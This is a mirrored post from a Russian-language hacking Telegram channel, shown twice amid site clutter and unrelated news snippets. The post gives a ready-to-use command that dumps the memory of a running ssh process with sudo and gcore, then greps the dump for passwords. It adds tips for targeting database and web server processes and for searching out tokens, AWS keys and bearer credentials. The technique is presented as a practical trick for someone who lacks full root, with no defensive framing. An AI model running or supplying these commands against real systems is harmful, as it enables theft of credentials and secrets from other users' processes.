HACKPROGLIB Telegram 4616
tgoop.com » United States » Библиотека хакера | Hacking, Infosec, ИБ, информационная безопасность » Telegram web » Post 4616
Библиотека хакера | Hacking, Infosec, ИБ, информационная безопасность
📌 Команда дня: дамп памяти с паролями

Иногда у вас есть доступ к sudo, но нет полноценного рута. В таких случаях можно попробовать вытащить секреты прямо из памяти процесса:


pidof ssh && sudo gcore -o dump $(pidof ssh)
strings dump.* | grep -i password


➡️ pidof ssh — получаем PID целевого процесса

➡️ sudo gcore -o dump — снимаем дамп памяти

➡️ strings ... | grep — вытаскиваем строки с паролями

💡 Можно найти: пароли, токены, ключи, строки подключения к базам и конфиденциальные переменные.

Лайфхаки:

— Меняй ssh на любой процесс, где потенциально может быть секрет (например, postgres, nginx, java)

— Можно заменить grep -i password на grep -Ei 'token|secret|aws|bearer'

— Работает без установки дополнительных утилит, только sudo и gcore (есть в gdb)

🐸 Библиотека хакера

#буст
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥5👍3
www.tgoop.com/hackproglib/4616
1.27K views



tgoop.com/hackproglib/4616
Create:
Last Update:

📌 Команда дня: дамп памяти с паролями

Иногда у вас есть доступ к sudo, но нет полноценного рута. В таких случаях можно попробовать вытащить секреты прямо из памяти процесса:


pidof ssh && sudo gcore -o dump $(pidof ssh)
strings dump.* | grep -i password


➡️ pidof ssh — получаем PID целевого процесса

➡️ sudo gcore -o dump — снимаем дамп памяти

➡️ strings ... | grep — вытаскиваем строки с паролями

💡 Можно найти: пароли, токены, ключи, строки подключения к базам и конфиденциальные переменные.

Лайфхаки:

— Меняй ssh на любой процесс, где потенциально может быть секрет (например, postgres, nginx, java)

— Можно заменить grep -i password на grep -Ei 'token|secret|aws|bearer'

— Работает без установки дополнительных утилит, только sudo и gcore (есть в gdb)

🐸 Библиотека хакера

#буст

BY Библиотека хакера | Hacking, Infosec, ИБ, информационная безопасность


Share with your friend now:
tgoop.com/hackproglib/4616

View MORE
Open in Telegram


Telegram News

Date: |

How to create a business channel on Telegram? (Tutorial) Other crimes that the SUCK Channel incited under Ng’s watch included using corrosive chemicals to make explosives and causing grievous bodily harm with intent. The court also found Ng responsible for calling on people to assist protesters who clashed violently with police at several universities in November 2019. Telegram Channels requirements & features A Hong Kong protester with a petrol bomb. File photo: Dylan Hollingsworth/HKFP. As the broader market downturn continues, yelling online has become the crypto trader’s latest coping mechanism after the rise of Goblintown Ethereum NFTs at the end of May and beginning of June, where holders made incoherent groaning sounds and role-played as urine-loving goblin creatures in late-night Twitter Spaces.
from us


📌 Команда дня: дамп памяти с паролями

 Библиотека хакера | Hacking, Infosec, ИБ, информационная безопасность TG
web: 4616
Библиотека хакера | Hacking, Infosec, ИБ, информационная безопасность.Telegram web
Библиотека хакера | Hacking, Infosec, ИБ, информационная безопасность Telegram TG Channel
Telegram Updated:
Telegram Библиотека хакера | Hacking, Infosec, ИБ, информационная безопасность
FROM American